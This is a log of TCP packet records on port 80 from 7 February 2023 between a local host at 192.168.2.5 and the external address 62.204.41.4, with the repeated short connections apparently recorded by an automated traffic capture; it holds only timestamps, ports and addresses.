Feb 7, 2023 19:59:41.247157097 CET	80	50271	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:41.247380018 CET	50271	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:41.371500015 CET	50271	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:41.372308016 CET	50272	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:41.432360888 CET	80	50271	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:41.432512999 CET	50271	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:41.433176994 CET	80	50272	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:41.433291912 CET	50272	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:41.450711012 CET	50272	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:41.511512041 CET	80	50272	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:41.513731956 CET	80	50272	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:41.513804913 CET	50272	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:41.623250961 CET	50272	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:41.623949051 CET	50273	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:41.683936119 CET	80	50272	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:41.684026957 CET	50272	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:41.686412096 CET	80	50273	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:41.686490059 CET	50273	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:41.686868906 CET	50273	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:41.749339104 CET	80	50273	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:41.751756907 CET	80	50273	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:41.751939058 CET	50273	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:41.892971992 CET	50273	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:41.893640995 CET	50274	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:41.955665112 CET	80	50273	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:41.956142902 CET	80	50274	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:41.956331015 CET	50273	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:41.956371069 CET	50274	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:42.509237051 CET	50274	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:42.571836948 CET	80	50274	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:42.575639963 CET	80	50274	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:42.575757027 CET	50274	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:42.732892990 CET	50274	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:42.733508110 CET	50275	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:42.795136929 CET	80	50275	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:42.795327902 CET	50275	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:42.795408010 CET	80	50274	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:42.795558929 CET	50274	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:42.829008102 CET	50275	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:42.890892982 CET	80	50275	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:42.892925978 CET	80	50275	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:42.893089056 CET	50275	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:43.909161091 CET	50275	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:43.909861088 CET	50276	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:43.971012115 CET	80	50275	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:43.971158028 CET	50275	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:43.972430944 CET	80	50276	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:43.972553968 CET	50276	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:43.973222017 CET	50276	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:44.036488056 CET	80	50276	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:44.040971994 CET	80	50276	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:44.041174889 CET	50276	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:44.303777933 CET	50276	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:44.304603100 CET	50277	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:44.366301060 CET	80	50276	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:44.366435051 CET	50276	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:44.367216110 CET	80	50277	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:44.367327929 CET	50277	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:44.403140068 CET	50277	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:44.465734959 CET	80	50277	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:44.470019102 CET	80	50277	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:44.470225096 CET	50277	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:44.605468988 CET	50277	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:44.607481003 CET	50278	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:44.668076992 CET	80	50277	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:44.668272018 CET	50277	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:44.670011044 CET	80	50278	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:44.670214891 CET	50278	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:44.686906099 CET	50278	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:44.749444008 CET	80	50278	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:44.751727104 CET	80	50278	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:44.751847029 CET	50278	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:44.857700109 CET	50278	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:44.858470917 CET	50279	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:44.920058012 CET	80	50279	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:44.920183897 CET	50279	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:44.920201063 CET	80	50278	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:44.920258045 CET	50278	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:44.920542002 CET	50279	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:44.981890917 CET	80	50279	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:44.984456062 CET	80	50279	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:44.984566927 CET	50279	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.092775106 CET	50279	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.093688011 CET	50280	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.154319048 CET	80	50279	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:45.154408932 CET	50279	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.156156063 CET	80	50280	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:45.156239033 CET	50280	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.156579018 CET	50280	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.219115019 CET	80	50280	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:45.222523928 CET	80	50280	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:45.222611904 CET	50280	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.348685026 CET	50280	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.349910021 CET	50281	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.411617041 CET	80	50280	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:45.411694050 CET	50280	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.412637949 CET	80	50281	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:45.412734032 CET	50281	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.414959908 CET	50281	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.477776051 CET	80	50281	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:45.480309010 CET	80	50281	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:45.480371952 CET	50281	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.592205048 CET	50281	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.593048096 CET	50282	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.654603958 CET	80	50282	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:45.654640913 CET	80	50281	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:45.654731035 CET	50282	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.654766083 CET	50281	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.658355951 CET	50282	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.719947100 CET	80	50282	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:45.722443104 CET	80	50282	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:45.722527981 CET	50282	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.832205057 CET	50282	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.833061934 CET	50283	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.894046068 CET	80	50282	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:45.894268990 CET	80	50283	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:45.894352913 CET	50282	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.894587994 CET	50283	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.895142078 CET	50283	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:45.957031965 CET	80	50283	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:45.960095882 CET	80	50283	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:45.960225105 CET	50283	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.076960087 CET	50283	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.077872038 CET	50284	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.138439894 CET	80	50284	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:46.138482094 CET	80	50283	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:46.138660908 CET	50283	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.139610052 CET	50284	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.139610052 CET	50284	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.200323105 CET	80	50284	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:46.203732014 CET	80	50284	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:46.209688902 CET	50284	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.327786922 CET	50284	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.342065096 CET	50285	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.388758898 CET	80	50284	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:46.389656067 CET	50284	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.402529001 CET	80	50285	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:46.405791044 CET	50285	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.406219006 CET	50285	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.466698885 CET	80	50285	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:46.468910933 CET	80	50285	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:46.469043016 CET	50285	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.588082075 CET	50285	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.589010954 CET	50286	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.648485899 CET	80	50285	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:46.648646116 CET	50285	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.648682117 CET	80	50286	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:46.648782969 CET	50286	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.657208920 CET	50286	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.716763020 CET	80	50286	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:46.719027996 CET	80	50286	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:46.719157934 CET	50286	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.831684113 CET	50286	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.833453894 CET	50287	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.891485929 CET	80	50286	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:46.891681910 CET	50286	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.893843889 CET	80	50287	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:46.893986940 CET	50287	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.895270109 CET	50287	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:46.955796003 CET	80	50287	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:46.958880901 CET	80	50287	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:46.959041119 CET	50287	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.062418938 CET	50287	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.064101934 CET	50288	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.123189926 CET	80	50287	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:47.123424053 CET	50287	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.125801086 CET	80	50288	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:47.126038074 CET	50288	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.126533985 CET	50288	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.188093901 CET	80	50288	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:47.191839933 CET	80	50288	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:47.192055941 CET	50288	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.295806885 CET	50288	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.296681881 CET	50289	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.357559919 CET	80	50288	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:47.357796907 CET	50288	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.358350992 CET	80	50289	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:47.358510017 CET	50289	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.359030008 CET	50289	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.420793056 CET	80	50289	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:47.423099041 CET	80	50289	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:47.423238039 CET	50289	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.529581070 CET	50289	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.530658960 CET	50290	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.592212915 CET	80	50290	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:47.592343092 CET	50290	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.592351913 CET	80	50289	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:47.592415094 CET	50289	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.592741966 CET	50290	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.652801991 CET	80	50290	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:47.655107975 CET	80	50290	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:47.655240059 CET	50290	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.779941082 CET	50290	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.780829906 CET	50291	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.840332031 CET	80	50290	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:47.840504885 CET	50290	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.841253042 CET	80	50291	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:47.841418982 CET	50291	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.841888905 CET	50291	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:47.902297974 CET	80	50291	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:47.904845953 CET	80	50291	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:47.905014992 CET	50291	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.024235010 CET	50291	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.025031090 CET	50292	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.084748983 CET	80	50291	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:48.084875107 CET	50291	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.085458040 CET	80	50292	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:48.085573912 CET	50292	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.086268902 CET	50292	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.146787882 CET	80	50292	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:48.150856972 CET	80	50292	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:48.150943995 CET	50292	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.264404058 CET	50292	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.265089989 CET	50293	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.324647903 CET	80	50293	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:48.324771881 CET	50293	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.324894905 CET	80	50292	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:48.324965954 CET	50292	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.325220108 CET	50293	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.384673119 CET	80	50293	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:48.386796951 CET	80	50293	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:48.386902094 CET	50293	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.498749971 CET	50293	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.499627113 CET	50294	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.558332920 CET	80	50293	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:48.559986115 CET	50293	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.561000109 CET	80	50294	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:48.561397076 CET	50294	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.563160896 CET	50294	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.624711990 CET	80	50294	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:48.627214909 CET	80	50294	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:48.627352953 CET	50294	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.738137960 CET	50294	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.739392996 CET	50295	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.799833059 CET	80	50294	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:48.800024033 CET	50294	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.801230907 CET	80	50295	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:48.802050114 CET	50295	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.802433014 CET	50295	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.863990068 CET	80	50295	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:48.866039038 CET	80	50295	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:48.866139889 CET	50295	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.967732906 CET	50295	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:48.968348980 CET	50296	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.029768944 CET	80	50295	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:49.029802084 CET	80	50296	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:49.029963970 CET	50295	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.029994011 CET	50296	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.030441046 CET	50296	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.091794014 CET	80	50296	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:49.096431017 CET	80	50296	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:49.096627951 CET	50296	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.201992035 CET	50296	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.202841043 CET	50297	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.263680935 CET	80	50296	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:49.264678955 CET	50296	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.265235901 CET	80	50297	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:49.265470028 CET	50297	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.266256094 CET	50297	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.328682899 CET	80	50297	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:49.331087112 CET	80	50297	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:49.331294060 CET	50297	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.441984892 CET	50297	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.443414927 CET	50298	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.513464928 CET	80	50298	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:49.513547897 CET	80	50297	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:49.513653040 CET	50297	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.514228106 CET	50298	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.514228106 CET	50298	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.578008890 CET	80	50298	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:49.582396030 CET	80	50298	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:49.582540989 CET	50298	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.696677923 CET	50298	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.697362900 CET	50299	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.757875919 CET	80	50299	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:49.758130074 CET	50299	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.758750916 CET	50299	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.758966923 CET	80	50298	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:49.759047985 CET	50298	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.819201946 CET	80	50299	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:49.821659088 CET	80	50299	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:49.821796894 CET	50299	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.937920094 CET	50299	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.938564062 CET	50300	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:49.998836040 CET	80	50299	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:49.998955965 CET	50299	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.000726938 CET	80	50300	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:50.000865936 CET	50300	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.001267910 CET	50300	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.062787056 CET	80	50300	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:50.066451073 CET	80	50300	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:50.066633940 CET	50300	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.170708895 CET	50300	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.171534061 CET	50301	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.232359886 CET	80	50300	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:50.232523918 CET	50300	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.233961105 CET	80	50301	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:50.234119892 CET	50301	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.234622955 CET	50301	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.297956944 CET	80	50301	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:50.300815105 CET	80	50301	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:50.301006079 CET	50301	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.405270100 CET	50301	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.406080961 CET	50302	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.468513012 CET	80	50301	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:50.468744040 CET	50301	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.470294952 CET	80	50302	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:50.470494032 CET	50302	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.470972061 CET	50302	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.532634974 CET	80	50302	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:50.535456896 CET	80	50302	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:50.535634041 CET	50302	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.639852047 CET	50302	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.640609980 CET	50303	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.701400042 CET	80	50303	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:50.701448917 CET	80	50302	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:50.701562881 CET	50302	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.701747894 CET	50303	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.704498053 CET	50303	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.765619993 CET	80	50303	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:50.767661095 CET	80	50303	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:50.767808914 CET	50303	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.905550003 CET	50303	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.906409025 CET	50304	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.967104912 CET	80	50304	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:50.967199087 CET	50304	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.967359066 CET	80	50303	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:50.967488050 CET	50303	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:50.968034029 CET	50304	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.028376102 CET	80	50304	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:51.030764103 CET	80	50304	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:51.031002045 CET	50304	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.156841993 CET	50304	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.163563013 CET	50305	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.217127085 CET	80	50304	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:51.217226982 CET	50304	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.224900007 CET	80	50305	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:51.225063086 CET	50305	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.225445986 CET	50305	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.286684036 CET	80	50305	62.204.41.4	192.168.2.5
